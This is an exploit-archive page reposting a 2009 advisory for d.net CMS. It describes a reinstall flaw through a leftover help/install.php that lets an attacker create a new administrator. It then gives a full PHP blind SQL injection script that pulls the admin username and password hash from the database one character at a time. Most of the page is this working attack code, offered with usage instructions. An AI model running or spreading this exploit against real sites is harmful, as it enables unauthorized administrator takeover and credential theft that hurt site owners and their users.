首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
d.net CMS Arbitrary Reinstall/Blind SQL Injection Exploit
来源:http://darkjoker.net23.net 作者:darkjoker 发布时间:2009-07-13  

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-           __           __     _       __                -
+      ____/ /___ ______/ /__  (_)___  / /_____  _____    +
-     / __  / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/    -
+    / /_/ / /_/ / /  / ,<   / / /_/ / ,< /  __/ /        +
-    \__,_/\__,_/_/  /_/|_|_/ /\____/_/|_|\___/_/         -
+                        /___/                            +
-                                                         -
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[+] Arbitrary Re-Installation Vulnerability

There's no check about the elimination of 'help' directory,
then whenever an administrator forget to delete it, we can
re-install the CMS, it means we can add a new administrator
account, without specify database's informations.

http://hostname/dnetCMS/help/install.php

 

[+] Blind SQL Injection Exploit

<?php

function usage () {
 exit ( "\n".
  "[+] d.net CMS Blind SQL Injection Exploit\n".
  "[+] Author  : darkjoker\n".
  "[+] Site    : http://darkjoker.net23.net\n".
  "[+] Download: https://sourceforge.net/projects/dnet/\n".
  "[+] Usage   : php xpl.php <hostname> <path>\n".
  "[+] Ex.     : php xpl.php localhost /dnetCMS/\n".
  "[+] Greetz  : cristina, puccio (they kept me company when I coded this stuff :D)\n".
  "\n");
}

function hex ($string) {
 $i=0;
 while ($i<strlen($string))
  $hex .= "%".dechex(ord($string[$i++]));
 return $hex;
}

function check ($hostname, $path, $character, $position, $field) {
 $character = ord($character);
 $sp = fsockopen ($hostname, 80);
 $query = hex ("'x' OR ASCII(SUBSTRING((SELECT {$field} FROM cms_security_master WHERE id=1),{$position},1))={$character} -- ");
 $request = "GET {$path}index.php?page={$query} HTTP/1.1\r\n".
     "Host: {$hostname}\r\n".
     "Connection: Close\r\n\r\n";
 fputs ($sp, $request);
 while (!feof ($sp))
  $reply .= fgets ($sp,1024);
 fclose ($sp);
 if ((preg_match ("|Location: index\.php|", $reply)) || (preg_match ("|<b>Cannot modify</b>:|", $reply)))
  return false;
 else
  return true;
}

function get_field ($hostname, $path, $field) {
 echo "[+] ".ucfirst($field)." (hash): ";
 $chars = "abcdef0123456789";
 for($i=0,$d=1;$d<=32;$i++) {
  if (check ($hostname, $path, $chars [$i], $d, $field)) {
   echo $chars [$i];
   $i = -1;
   $d++;
  }
 }
 echo "\n";
}

if ($argc != 3)
 usage ();
$hostname = $argv [1];
$path = $argv [2];
$fields = array ("username", "password");
foreach ($fields as $field)
 get_field ($hostname, $path, $field);
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Playlistmaker 1.5 (.M3U/M3L/T
·Pirch IRC 98 Client (response)
·M3U/M3L to ASX/WPL 1.1 (ASX,M
·Photo DVD Maker Pro versions 8
·Morcego CMS <= 1.7.6 Remote Bl
·Linux/x86 Port Binding Shellco
·AwingSoft Web3D Player (WindsP
·Tandberg MXP F7.0 (USER) Remot
·eEye Retina WiFi Security Scan
·RunCMS <= 1.6.3 (double ext) R
·OtsAv DJ/TV/Radio Multiple Loc
·ScITE Editor 1.72 Local Crash
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved